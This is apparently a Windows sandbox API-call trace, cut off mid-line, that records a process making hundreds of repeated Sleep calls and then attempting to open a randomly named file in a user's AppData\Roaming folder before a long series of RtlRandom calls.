[0241.653] Sleep (dwMilliseconds=0x258) [0241.673] Sleep (dwMilliseconds=0x258) [0241.710] Sleep (dwMilliseconds=0x258) [0241.744] Sleep (dwMilliseconds=0x258) [0241.748] Sleep (dwMilliseconds=0x258) [0241.786] Sleep (dwMilliseconds=0x258) [0241.944] Sleep (dwMilliseconds=0x258) [0241.995] Sleep (dwMilliseconds=0x258) [0242.032] Sleep (dwMilliseconds=0x258) [0242.104] Sleep (dwMilliseconds=0x258) [0242.162] Sleep (dwMilliseconds=0x258) [0242.246] Sleep (dwMilliseconds=0x258) [0242.301] Sleep (dwMilliseconds=0x258) [0242.366] Sleep (dwMilliseconds=0x258) [0242.398] Sleep (dwMilliseconds=0x258) [0242.454] Sleep (dwMilliseconds=0x258) [0242.501] Sleep (dwMilliseconds=0x258) [0242.535] Sleep (dwMilliseconds=0x258) [0242.585] Sleep (dwMilliseconds=0x258) [0242.638] Sleep (dwMilliseconds=0x258) [0242.798] Sleep (dwMilliseconds=0x258) [0242.848] Sleep (dwMilliseconds=0x258) [0242.875] Sleep (dwMilliseconds=0x258) [0242.953] Sleep (dwMilliseconds=0x258) [0243.107] Sleep (dwMilliseconds=0x258) [0243.132] Sleep (dwMilliseconds=0x258) [0243.176] Sleep (dwMilliseconds=0x258) [0243.282] Sleep (dwMilliseconds=0x258) [0243.324] Sleep (dwMilliseconds=0x258) [0243.403] Sleep (dwMilliseconds=0x258) [0243.478] Sleep (dwMilliseconds=0x258) [0243.548] Sleep (dwMilliseconds=0x258) [0243.600] Sleep (dwMilliseconds=0x258) [0243.721] Sleep (dwMilliseconds=0x258) [0243.809] Sleep (dwMilliseconds=0x258) [0243.884] Sleep (dwMilliseconds=0x258) [0243.968] Sleep (dwMilliseconds=0x258) [0244.045] Sleep (dwMilliseconds=0x258) [0244.106] Sleep (dwMilliseconds=0x258) [0244.153] Sleep (dwMilliseconds=0x258) [0244.300] Sleep (dwMilliseconds=0x258) [0244.391] Sleep (dwMilliseconds=0x258) [0244.435] Sleep (dwMilliseconds=0x258) [0244.507] Sleep (dwMilliseconds=0x258) [0244.634] Sleep (dwMilliseconds=0x258) [0244.700] Sleep (dwMilliseconds=0x258) [0244.751] Sleep (dwMilliseconds=0x258) [0244.837] Sleep (dwMilliseconds=0x258) [0244.923] Sleep (dwMilliseconds=0x258) [0244.967] Sleep (dwMilliseconds=0x258) [0245.036] Sleep (dwMilliseconds=0x258) [0245.113] Sleep (dwMilliseconds=0x258) [0245.185] Sleep (dwMilliseconds=0x258) [0245.276] Sleep (dwMilliseconds=0x258) [0245.349] Sleep (dwMilliseconds=0x258) [0245.422] Sleep (dwMilliseconds=0x258) [0245.464] Sleep (dwMilliseconds=0x258) [0245.535] Sleep (dwMilliseconds=0x258) [0245.608] Sleep (dwMilliseconds=0x258) [0245.661] Sleep (dwMilliseconds=0x258) [0245.722] Sleep (dwMilliseconds=0x258) [0245.794] Sleep (dwMilliseconds=0x258) [0245.864] Sleep (dwMilliseconds=0x258) [0245.922] Sleep (dwMilliseconds=0x258) [0246.003] Sleep (dwMilliseconds=0x258) [0246.078] Sleep (dwMilliseconds=0x258) [0246.131] Sleep (dwMilliseconds=0x258) [0246.242] Sleep (dwMilliseconds=0x258) [0246.323] Sleep (dwMilliseconds=0x258) [0246.394] Sleep (dwMilliseconds=0x258) [0246.431] Sleep (dwMilliseconds=0x258) [0246.504] Sleep (dwMilliseconds=0x258) [0246.685] Sleep (dwMilliseconds=0x258) [0246.736] Sleep (dwMilliseconds=0x258) [0246.795] Sleep (dwMilliseconds=0x258) [0246.881] Sleep (dwMilliseconds=0x258) [0246.942] Sleep (dwMilliseconds=0x258) [0246.998] Sleep (dwMilliseconds=0x258) [0247.070] Sleep (dwMilliseconds=0x258) [0247.138] Sleep (dwMilliseconds=0x258) [0247.185] Sleep (dwMilliseconds=0x258) [0247.283] Sleep (dwMilliseconds=0x258) [0247.356] Sleep (dwMilliseconds=0x258) [0247.404] Sleep (dwMilliseconds=0x258) [0247.466] Sleep (dwMilliseconds=0x258) [0247.536] Sleep (dwMilliseconds=0x258) [0247.594] Sleep (dwMilliseconds=0x258) [0247.643] Sleep (dwMilliseconds=0x258) [0247.718] Sleep (dwMilliseconds=0x258) [0247.825] Sleep (dwMilliseconds=0x258) [0247.896] Sleep (dwMilliseconds=0x258) [0247.956] Sleep (dwMilliseconds=0x258) [0247.972] Sleep (dwMilliseconds=0x258) [0248.013] Sleep (dwMilliseconds=0x258) [0248.083] Sleep (dwMilliseconds=0x258) [0248.159] Sleep (dwMilliseconds=0x258) [0248.228] Sleep (dwMilliseconds=0x258) [0248.307] Sleep (dwMilliseconds=0x258) [0248.414] Sleep (dwMilliseconds=0x258) [0248.476] Sleep (dwMilliseconds=0x258) [0248.545] Sleep (dwMilliseconds=0x258) [0248.618] Sleep (dwMilliseconds=0x258) [0248.679] Sleep (dwMilliseconds=0x258) [0248.735] Sleep (dwMilliseconds=0x258) [0248.810] Sleep (dwMilliseconds=0x258) [0248.882] Sleep (dwMilliseconds=0x258) [0248.928] Sleep (dwMilliseconds=0x258) [0249.047] Sleep (dwMilliseconds=0x258) [0249.120] Sleep (dwMilliseconds=0x258) [0249.159] Sleep (dwMilliseconds=0x258) [0249.270] Sleep (dwMilliseconds=0x258) [0249.350] Sleep (dwMilliseconds=0x258) [0249.403] Sleep (dwMilliseconds=0x258) [0249.461] Sleep (dwMilliseconds=0x258) [0249.539] Sleep (dwMilliseconds=0x258) [0249.611] Sleep (dwMilliseconds=0x258) [0249.654] Sleep (dwMilliseconds=0x258) [0249.726] Sleep (dwMilliseconds=0x258) [0249.804] Sleep (dwMilliseconds=0x258) [0249.857] Sleep (dwMilliseconds=0x258) [0249.926] Sleep (dwMilliseconds=0x258) [0249.997] Sleep (dwMilliseconds=0x258) [0250.066] Sleep (dwMilliseconds=0x258) [0250.118] Sleep (dwMilliseconds=0x258) [0250.251] Sleep (dwMilliseconds=0x258) [0250.324] Sleep (dwMilliseconds=0x258) [0250.371] Sleep (dwMilliseconds=0x258) [0250.444] Sleep (dwMilliseconds=0x258) [0250.518] Sleep (dwMilliseconds=0x258) [0250.567] Sleep (dwMilliseconds=0x258) [0250.628] Sleep (dwMilliseconds=0x258) [0250.700] Sleep (dwMilliseconds=0x258) [0250.765] Sleep (dwMilliseconds=0x258) [0250.824] Sleep (dwMilliseconds=0x258) [0250.931] Sleep (dwMilliseconds=0x258) [0251.009] Sleep (dwMilliseconds=0x258) [0251.059] Sleep (dwMilliseconds=0x258) [0251.132] Sleep (dwMilliseconds=0x258) [0251.222] Sleep (dwMilliseconds=0x258) [0251.274] Sleep (dwMilliseconds=0x258) [0251.412] Sleep (dwMilliseconds=0x258) [0251.497] Sleep (dwMilliseconds=0x258) [0251.560] Sleep (dwMilliseconds=0x258) [0251.614] Sleep (dwMilliseconds=0x258) [0251.685] Sleep (dwMilliseconds=0x258) [0251.760] Sleep (dwMilliseconds=0x258) [0251.799] Sleep (dwMilliseconds=0x258) [0251.877] Sleep (dwMilliseconds=0x258) [0251.964] Sleep (dwMilliseconds=0x258) [0252.040] Sleep (dwMilliseconds=0x258) [0252.103] Sleep (dwMilliseconds=0x258) [0252.186] Sleep (dwMilliseconds=0x258) [0252.290] Sleep (dwMilliseconds=0x258) [0252.345] Sleep (dwMilliseconds=0x258) [0252.426] Sleep (dwMilliseconds=0x258) [0252.553] Sleep (dwMilliseconds=0x258) [0252.620] Sleep (dwMilliseconds=0x258) [0252.687] Sleep (dwMilliseconds=0x258) [0252.760] Sleep (dwMilliseconds=0x258) [0252.831] Sleep (dwMilliseconds=0x258) [0252.877] Sleep (dwMilliseconds=0x258) [0252.950] Sleep (dwMilliseconds=0x258) [0253.022] Sleep (dwMilliseconds=0x258) [0253.066] Sleep (dwMilliseconds=0x258) [0253.138] Sleep (dwMilliseconds=0x258) [0253.232] Sleep (dwMilliseconds=0x258) [0253.289] Sleep (dwMilliseconds=0x258) [0253.349] Sleep (dwMilliseconds=0x258) [0253.426] Sleep (dwMilliseconds=0x258) [0253.497] Sleep (dwMilliseconds=0x258) [0253.535] Sleep (dwMilliseconds=0x258) [0253.618] Sleep (dwMilliseconds=0x258) [0253.726] Sleep (dwMilliseconds=0x258) [0253.798] Sleep (dwMilliseconds=0x258) [0253.837] Sleep (dwMilliseconds=0x258) [0253.875] Sleep (dwMilliseconds=0x258) [0253.917] Sleep (dwMilliseconds=0x258) [0253.922] Sleep (dwMilliseconds=0x258) [0253.962] Sleep (dwMilliseconds=0x258) [0253.997] Sleep (dwMilliseconds=0x258) [0254.016] Sleep (dwMilliseconds=0x258) [0254.045] Sleep (dwMilliseconds=0x258) [0254.082] Sleep (dwMilliseconds=0x258) [0254.112] Sleep (dwMilliseconds=0x258) [0254.167] Sleep (dwMilliseconds=0x258) [0254.259] Sleep (dwMilliseconds=0x258) [0254.330] Sleep (dwMilliseconds=0x258) [0254.371] Sleep (dwMilliseconds=0x258) [0254.415] Sleep (dwMilliseconds=0x258) [0254.491] Sleep (dwMilliseconds=0x258) [0254.572] Sleep (dwMilliseconds=0x258) [0254.618] Sleep (dwMilliseconds=0x258) [0254.684] Sleep (dwMilliseconds=0x258) [0254.760] Sleep (dwMilliseconds=0x258) [0254.831] Sleep (dwMilliseconds=0x258) [0254.845] Sleep (dwMilliseconds=0x258) [0254.919] Sleep (dwMilliseconds=0x258) [0254.962] Sleep (dwMilliseconds=0x258) [0255.016] Sleep (dwMilliseconds=0x258) [0255.090] Sleep (dwMilliseconds=0x258) [0255.165] Sleep (dwMilliseconds=0x258) [0255.240] Sleep (dwMilliseconds=0x258) [0255.304] Sleep (dwMilliseconds=0x258) [0255.377] Sleep (dwMilliseconds=0x258) [0255.441] Sleep (dwMilliseconds=0x258) [0255.488] Sleep (dwMilliseconds=0x258) [0255.559] Sleep (dwMilliseconds=0x258) [0255.634] Sleep (dwMilliseconds=0x258) [0255.676] Sleep (dwMilliseconds=0x258) [0255.745] Sleep (dwMilliseconds=0x258) [0255.839] Sleep (dwMilliseconds=0x258) [0255.915] Sleep (dwMilliseconds=0x258) [0255.953] Sleep (dwMilliseconds=0x258) [0256.030] Sleep (dwMilliseconds=0x258) [0256.146] Sleep (dwMilliseconds=0x258) [0256.276] Sleep (dwMilliseconds=0x258) [0256.374] Sleep (dwMilliseconds=0x258) [0256.453] Sleep (dwMilliseconds=0x258) [0256.527] Sleep (dwMilliseconds=0x258) [0256.579] Sleep (dwMilliseconds=0x258) [0256.651] Sleep (dwMilliseconds=0x258) [0256.730] Sleep (dwMilliseconds=0x258) [0256.841] Sleep (dwMilliseconds=0x258) [0256.914] Sleep (dwMilliseconds=0x258) [0256.994] Sleep (dwMilliseconds=0x258) [0257.065] Sleep (dwMilliseconds=0x258) [0257.144] Sleep (dwMilliseconds=0x258) [0257.345] Sleep (dwMilliseconds=0x258) [0257.414] Sleep (dwMilliseconds=0x258) [0257.479] Sleep (dwMilliseconds=0x258) [0257.562] Sleep (dwMilliseconds=0x258) [0257.635] Sleep (dwMilliseconds=0x258) [0257.670] Sleep (dwMilliseconds=0x258) [0257.710] Sleep (dwMilliseconds=0x258) [0257.783] Sleep (dwMilliseconds=0x258) [0257.868] Sleep (dwMilliseconds=0x258) [0257.950] Sleep (dwMilliseconds=0x258) [0258.021] Sleep (dwMilliseconds=0x258) [0258.096] Sleep (dwMilliseconds=0x258) [0258.158] Sleep (dwMilliseconds=0x258) [0258.233] Sleep (dwMilliseconds=0x258) [0258.324] Sleep (dwMilliseconds=0x258) [0258.396] Sleep (dwMilliseconds=0x258) [0258.509] Sleep (dwMilliseconds=0x258) [0258.584] Sleep (dwMilliseconds=0x258) [0258.657] Sleep (dwMilliseconds=0x258) [0258.716] Sleep (dwMilliseconds=0x258) [0258.772] Sleep (dwMilliseconds=0x258) [0258.853] Sleep (dwMilliseconds=0x258) [0258.924] Sleep (dwMilliseconds=0x258) [0259.005] Sleep (dwMilliseconds=0x258) [0259.080] Sleep (dwMilliseconds=0x258) [0259.157] Sleep (dwMilliseconds=0x258) [0259.198] Sleep (dwMilliseconds=0x258) [0259.236] Sleep (dwMilliseconds=0x258) [0259.328] Sleep (dwMilliseconds=0x258) [0259.409] Sleep (dwMilliseconds=0x258) [0259.488] Sleep (dwMilliseconds=0x258) [0259.565] Sleep (dwMilliseconds=0x258) [0259.674] Sleep (dwMilliseconds=0x258) [0259.728] Sleep (dwMilliseconds=0x258) [0259.793] Sleep (dwMilliseconds=0x258) [0259.873] Sleep (dwMilliseconds=0x258) [0259.940] Sleep (dwMilliseconds=0x258) [0260.000] Sleep (dwMilliseconds=0x258) [0260.073] Sleep (dwMilliseconds=0x258) [0260.147] Sleep (dwMilliseconds=0x258) [0260.191] Sleep (dwMilliseconds=0x258) [0260.279] Sleep (dwMilliseconds=0x258) [0260.366] Sleep (dwMilliseconds=0x258) [0260.458] Sleep (dwMilliseconds=0x258) [0260.548] Sleep (dwMilliseconds=0x258) [0260.625] Sleep (dwMilliseconds=0x258) [0260.701] Sleep (dwMilliseconds=0x258) [0260.744] Sleep (dwMilliseconds=0x258) [0260.807] Sleep (dwMilliseconds=0x258) [0260.935] Sleep (dwMilliseconds=0x258) [0261.017] Sleep (dwMilliseconds=0x258) [0261.075] Sleep (dwMilliseconds=0x258) [0261.155] Sleep (dwMilliseconds=0x258) [0261.247] Sleep (dwMilliseconds=0x258) [0261.296] Sleep (dwMilliseconds=0x258) [0261.368] Sleep (dwMilliseconds=0x258) [0261.443] Sleep (dwMilliseconds=0x258) [0261.519] Sleep (dwMilliseconds=0x258) [0261.585] Sleep (dwMilliseconds=0x258) [0261.665] Sleep (dwMilliseconds=0x258) [0261.740] Sleep (dwMilliseconds=0x258) [0261.776] Sleep (dwMilliseconds=0x258) [0261.843] Sleep (dwMilliseconds=0x258) [0261.920] Sleep (dwMilliseconds=0x258) [0262.044] Sleep (dwMilliseconds=0x258) [0262.124] Sleep (dwMilliseconds=0x258) [0262.196] Sleep (dwMilliseconds=0x258) [0262.291] Sleep (dwMilliseconds=0x258) [0262.339] Sleep (dwMilliseconds=0x258) [0262.416] Sleep (dwMilliseconds=0x258) [0262.493] Sleep (dwMilliseconds=0x258) [0262.536] Sleep (dwMilliseconds=0x258) [0262.579] Sleep (dwMilliseconds=0x258) [0262.617] Sleep (dwMilliseconds=0x258) [0262.682] Sleep (dwMilliseconds=0x258) [0262.702] Sleep (dwMilliseconds=0x258) [0262.740] Sleep (dwMilliseconds=0x258) [0262.792] Sleep (dwMilliseconds=0x258) [0262.854] Sleep (dwMilliseconds=0x258) [0262.902] Sleep (dwMilliseconds=0x258) [0262.939] Sleep (dwMilliseconds=0x258) [0262.952] Sleep (dwMilliseconds=0x258) [0262.983] Sleep (dwMilliseconds=0x258) [0263.024] Sleep (dwMilliseconds=0x258) [0263.066] Sleep (dwMilliseconds=0x258) [0263.103] Sleep (dwMilliseconds=0x258) [0263.144] Sleep (dwMilliseconds=0x258) [0263.300] Sleep (dwMilliseconds=0x258) [0263.324] Sleep (dwMilliseconds=0x258) [0263.388] Sleep (dwMilliseconds=0x258) [0263.520] Sleep (dwMilliseconds=0x258) [0263.555] Sleep (dwMilliseconds=0x258) [0263.631] Sleep (dwMilliseconds=0x258) [0263.705] Sleep (dwMilliseconds=0x258) [0263.756] Sleep (dwMilliseconds=0x258) [0263.821] Sleep (dwMilliseconds=0x258) [0263.903] Sleep (dwMilliseconds=0x258) [0263.966] Sleep (dwMilliseconds=0x258) [0264.012] Sleep (dwMilliseconds=0x258) [0264.082] Sleep (dwMilliseconds=0x258) [0264.160] Sleep (dwMilliseconds=0x258) [0264.202] Sleep (dwMilliseconds=0x258) [0264.293] Sleep (dwMilliseconds=0x258) [0264.365] Sleep (dwMilliseconds=0x258) [0264.456] Sleep (dwMilliseconds=0x258) [0264.516] Sleep (dwMilliseconds=0x258) [0264.601] Sleep (dwMilliseconds=0x258) [0264.664] Sleep (dwMilliseconds=0x258) [0264.713] Sleep (dwMilliseconds=0x258) [0264.786] Sleep (dwMilliseconds=0x258) [0264.869] Sleep (dwMilliseconds=0x258) [0264.950] Sleep (dwMilliseconds=0x258) [0265.022] Sleep (dwMilliseconds=0x258) [0265.070] Sleep (dwMilliseconds=0x258) [0265.130] Sleep (dwMilliseconds=0x258) [0265.209] Sleep (dwMilliseconds=0x258) [0265.287] Sleep (dwMilliseconds=0x258) [0265.307] Sleep (dwMilliseconds=0x258) [0265.326] Sleep (dwMilliseconds=0x258) [0265.361] Sleep (dwMilliseconds=0x258) [0265.438] Sleep (dwMilliseconds=0x258) [0265.515] Sleep (dwMilliseconds=0x258) [0265.596] Sleep (dwMilliseconds=0x258) [0265.634] Sleep (dwMilliseconds=0x258) [0265.705] Sleep (dwMilliseconds=0x258) [0265.782] Sleep (dwMilliseconds=0x258) [0265.855] Sleep (dwMilliseconds=0x258) [0265.910] Sleep (dwMilliseconds=0x258) [0265.986] Sleep (dwMilliseconds=0x258) [0266.065] Sleep (dwMilliseconds=0x258) [0266.113] Sleep (dwMilliseconds=0x258) [0266.173] Sleep (dwMilliseconds=0x258) [0266.291] Sleep (dwMilliseconds=0x258) [0266.355] Sleep (dwMilliseconds=0x258) [0266.418] Sleep (dwMilliseconds=0x258) [0266.509] Sleep (dwMilliseconds=0x258) [0266.603] Sleep (dwMilliseconds=0x258) [0266.652] Sleep (dwMilliseconds=0x258) [0266.725] Sleep (dwMilliseconds=0x258) [0266.844] Sleep (dwMilliseconds=0x258) [0266.895] Sleep (dwMilliseconds=0x258) [0266.967] Sleep (dwMilliseconds=0x258) [0267.040] Sleep (dwMilliseconds=0x258) [0267.092] Sleep (dwMilliseconds=0x258) [0267.150] Sleep (dwMilliseconds=0x258) [0267.223] Sleep (dwMilliseconds=0x258) [0267.308] Sleep (dwMilliseconds=0x258) [0267.359] Sleep (dwMilliseconds=0x258) [0267.481] Sleep (dwMilliseconds=0x258) [0267.554] Sleep (dwMilliseconds=0x258) [0267.622] Sleep (dwMilliseconds=0x258) [0267.693] Sleep (dwMilliseconds=0x258) [0267.768] Sleep (dwMilliseconds=0x258) [0267.823] Sleep (dwMilliseconds=0x258) [0267.885] Sleep (dwMilliseconds=0x258) [0268.009] Sleep (dwMilliseconds=0x258) [0268.076] Sleep (dwMilliseconds=0x258) [0268.116] Sleep (dwMilliseconds=0x258) [0268.168] Sleep (dwMilliseconds=0x258) [0268.204] Sleep (dwMilliseconds=0x258) [0268.286] Sleep (dwMilliseconds=0x258) [0268.356] Sleep (dwMilliseconds=0x258) [0268.441] Sleep (dwMilliseconds=0x258) [0268.513] Sleep (dwMilliseconds=0x258) [0268.579] Sleep (dwMilliseconds=0x258) [0268.665] Sleep (dwMilliseconds=0x258) [0268.737] Sleep (dwMilliseconds=0x258) [0268.775] Sleep (dwMilliseconds=0x258) [0268.844] Sleep (dwMilliseconds=0x258) [0268.916] Sleep (dwMilliseconds=0x258) [0268.961] Sleep (dwMilliseconds=0x258) [0269.027] Sleep (dwMilliseconds=0x258) [0269.091] Sleep (dwMilliseconds=0x258) [0269.288] Sleep (dwMilliseconds=0x258) [0269.358] Sleep (dwMilliseconds=0x258) [0269.437] Sleep (dwMilliseconds=0x258) [0269.511] Sleep (dwMilliseconds=0x258) [0269.551] Sleep (dwMilliseconds=0x258) [0269.628] Sleep (dwMilliseconds=0x258) [0269.705] Sleep (dwMilliseconds=0x258) [0269.756] Sleep (dwMilliseconds=0x258) [0269.817] Sleep (dwMilliseconds=0x258) [0269.917] Sleep (dwMilliseconds=0x258) [0269.974] Sleep (dwMilliseconds=0x258) [0270.027] Sleep (dwMilliseconds=0x258) [0270.110] Sleep (dwMilliseconds=0x258) [0270.181] Sleep (dwMilliseconds=0x258) [0270.224] Sleep (dwMilliseconds=0x258) [0270.324] Sleep (dwMilliseconds=0x258) [0270.397] Sleep (dwMilliseconds=0x258) [0270.447] Sleep (dwMilliseconds=0x258) [0270.515] Sleep (dwMilliseconds=0x258) [0270.596] Sleep (dwMilliseconds=0x258) [0270.658] Sleep (dwMilliseconds=0x258) [0270.720] Sleep (dwMilliseconds=0x258) [0270.793] Sleep (dwMilliseconds=0x258) [0270.876] Sleep (dwMilliseconds=0x258) [0270.914] Sleep (dwMilliseconds=0x258) [0270.985] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x22) returned 0x9881840 [0270.986] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x47bc751b [0270.986] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x8f) returned 0x98818b0 [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb749dce0 [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd7aa615a [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5a74bf97 [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc2cda422 [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcec7042a [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf7b0f4a6 [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1288dd33 [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x969734ad [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf0080c43 [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7dd55c2e [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb0b0f08c [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe3ed094d [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8ccf713c [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3d971b16 [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd1f50460 [0270.986] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6c95f8ed [0270.987] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6f39c21 [0270.987] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8e4ec90f [0270.987] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf7087d07 [0270.987] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfcb691ea [0270.987] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x538fbb48 [0270.987] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc8938ad4 [0270.987] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3eb1e626 [0270.987] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6d010168 [0270.987] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5deb0eb0 [0270.990] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x871de60c [0270.990] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x96c6435a [0270.990] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x155c153c [0270.990] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9aea3354 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x942f39ba [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1f126ece [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x78c15497 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xca85f8ad [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3f9929ad [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfd5a904c [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x219b50b4 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x207b4c78 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x15643701 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x356d4e8f [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2b6a2bbd [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x63564059 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4253983d [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe04391bd [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc6aded05 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x23f1e9a6 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd4111ae2 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9597a5b1 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1da167a2 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3c218020 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa99e57b9 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9593beaa [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc8bf7473 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdc81cbe8 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd0b3394d [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf8d5dbe6 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xae146857 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5d7b1a [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9d980774 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5098d013 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x17e3fedc [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5ce5df9e [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x97fb9e3 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf4001c7 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x36695f32 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x953b35c4 [0270.991] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x65bd0c2 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdc850c79 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbe2809b4 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x467447c [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x236bcb39 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x644a7eb9 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x203e314a [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6800699b [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xca1b14c0 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7328cb1c [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x862e230d [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd4d59608 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4c99326 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x72cbe8ea [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa4aa3ebc [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd519f71c [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7b0c4d69 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd9990495 [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x95d66a0f [0270.992] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9faa00f8 [0270.992] RtlRandom (in: 